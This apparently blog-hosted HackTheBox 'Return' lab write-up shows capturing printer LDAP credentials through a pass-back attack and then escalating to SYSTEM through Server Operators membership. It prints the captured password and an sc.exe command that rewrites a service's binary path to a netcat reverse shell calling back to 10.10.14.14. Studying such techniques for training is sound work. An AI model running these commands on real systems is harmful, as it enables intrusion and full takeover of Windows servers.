HackTheBox : Return

Return is a Windows machine with a network printer administration panel that stores LDAP credentials. These credentials can be captured by inputting a rogue LDAP server which allows obtaining an initial access on the server through WinRM. The compromised user was part of a privilege group which allows us to escalate our privileges to NT AUTHORITY\SYSTEM.

Reconnaissance

Nmap

As usual, let’s start with a nmap scan :

Nmap full tcp syn scan

We have several open tcp ports such as 53, 88, 389, 636, 3268, 5985, etc. Based on that, we can conclude that the target machine is a Windows domain controller. Nevertheless, we also have port 80 open. Well, let’s start our enumeration with that port, then move on to the other protocols if we find nothing.

HTTP — TCP/80

In this section, we are going to enumerate the web server.

That said, let’s take a quick look at the main webpage :

Main Page

Great ! Let’s browse the other webpages to have a better understanding of the features used by the website. When clicking on the settings tab, I have been redirected to the following page :

Printer Admin Panel

Interesting ! This is the printer admin panel page. Let’s see if we can retrieve the password by inspecting the source code :

Password not stored in the source code

Unfortunately, the LDAP password was not sent back to the browser and therefore we could not retrieve it from the source code.

Well, let’s try to intercept the request with Burp after clicking on the Update button :

Intercepting POST request

As you can see, a POST request is sent to /settings.php with the IP address specified in the server address input.

So, what happens when we change this IP address with ours ?

To answer this question, let’s give it a try :

Changing the initial IP with our IP address

After that, let’s run our netcat listener on port 389 :

Netcat is listening on port 389

Once done, we can then forward the above intercepted request to the server and normally we must receive this beautiful response on our machine :

LDAP response

When taking a close look at the LDAP response, you can see that we have a username : return\svc-printer and another string 1edFg43012!! which might be svc-printer’s password. Well, let’s check if this can get an initial access to the target system :

Authentication succeeded

The command is a one-liner that I particularly use always because it checks the authentication on other protocols without having me to execute the command several time with different protocols. Haha, the authentication succeeded.

The attack above is called a LDAP Pass-back attack. It’s a common attack against network devices, such as printers. It can be performed when we gain access to a device’s configuration where the LDAP parameters are specified. In an LDAP Pass-back attack, we can modify the default IP to our IP and then test the LDAP configuration, which will force the device (here the printer) to attempt LDAP authentication to our device. We can then intercept this authentication attempt to recover the LDAP credentials.

Let’s try to authenticate to svc-printer account with evil-winrm :

Authenticating to svc-printer account

Fantastic ! Let’s retrieve the user flag :

user.txt flag

Post Exploitation

In this section, we will try to move laterally and escalate our privileges.

Let’s first download the domain information using bloodhound-python :

Collecting domain information

Once done, you can launch your neo4j database, then upload the domain information in bloodhound :

Launching neo4j

After that, I took a look at bloodhound’s pre-built analytics queries but found only this path :

Shortest paths to Domain Admins from owned principals

Nevertheless, this leads us nowhere as we don’t have the printer machine account’s password.

After thinking a while, I noticed that I did not perform the basic enumeration that I generally do once I compromise a machine. So I went back on the target machine and did it :

Enumerating groups information

Enumerating privileges

Enumerating usernames

svc-printer’s info

As you can see, svc-printer is part of the Server Operators group. Let’s see who else is part of that group :

Enumerating users that belong to Server Operators group

svc-printer is the only user that belongs to that group.

The issue here is that Server Operators is a built-in privilege group that has no members by default. Based on Microsoft documentation, members of the Server Operators group can take the following actions :

• Format the hard drive of the computer
• Shutdown the computer
• Create and delete network shared resources
• Start and stop services
• Backup and restore files

Well, let’s check if there is a mean to exploit this vulnerability :

After taking a look at this article, it seems that we can abuse this membership to escalate our privileges to SYSTEM.

Yeah, yeah, you got it right :)

To do that, we will first list the services running on our target machine, then we will change one of the service’s binary path :

Listing running services

Then, I decided to change VGAuthService binary path. To make things really simple, I will add svc-printer to the Domain Admins group :

Unfortunately, it did not work. Therefore, I tried another method using netcat. Indeed, I uploaded a netcat binary on the target system, then we tried to get a reverse shell by modifying a service’s binary path.

Note : You can find the netcat binary in /usr/share/windows-resources/binaries

Uploading nc on the target machine

Once done, let’s change the service’s binary path with our netcat reverse shell using the following command :

sc.exe config VGAuthService binPath="C:\Users\svc-printer\AppData\Local\Temp\n
md.exe 10.10.14.14 443"

Changing the binPath with our netcat reverse shell

Launching a netcat listener on our attacker machine

Stopping and starting VGAuthService service

Getting a shell as NT AUTHORITY\SYSTEM

Guess what ? We got a reverse shell as ‘NT Authority\System’

Let’s now retrieve the root flag. Shall we ?

root.txt flag

Key Techniques Used

Here are the key techniques covered in this box :

• Performing a LDAP Pass-back attack by setting a rogue LDAP server then force the printer to authenticate to our server so that we can intercept the credentials.
• Modifying a service’s binary path with our payload, then stopping and restarting it to get a shell with the highest privileges.

Lessons Learned

1/ To get an initial access to the target machine, we exploited a printer admin panel by performing an LDAP Pass-back attack. To prevent that, we recommend implementing robust authentication protocol such as ldaps. For more information, refer here

2/ After getting a foothold, we escalated our privileges to NT AUTHORITY\SYSTEM by abusing our membership in the Server Operators group which is a built-in privileged group on the domain. To address that, we recommend reviewing users’ permissions to remove any unnecessary privileges.

3/ Last but not least, we also noticed the usage of a weak password policy as showed on the image below. To address that, we recommend using strong password policy. For that, you can refer here

Weak password policy

Wrap Up

That’s it guys. Congrats on having made it so far 👏

I hope you enjoyed the writeup.

If so, do not forget to click on the little clap icon below and subscribe to my newsletter to keep up with my latest articles !

Last but not least, hack the planet 😎

Resources

https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack
https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#server-operators
https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/

Contact

GitHub : https://github.com/0liverFlow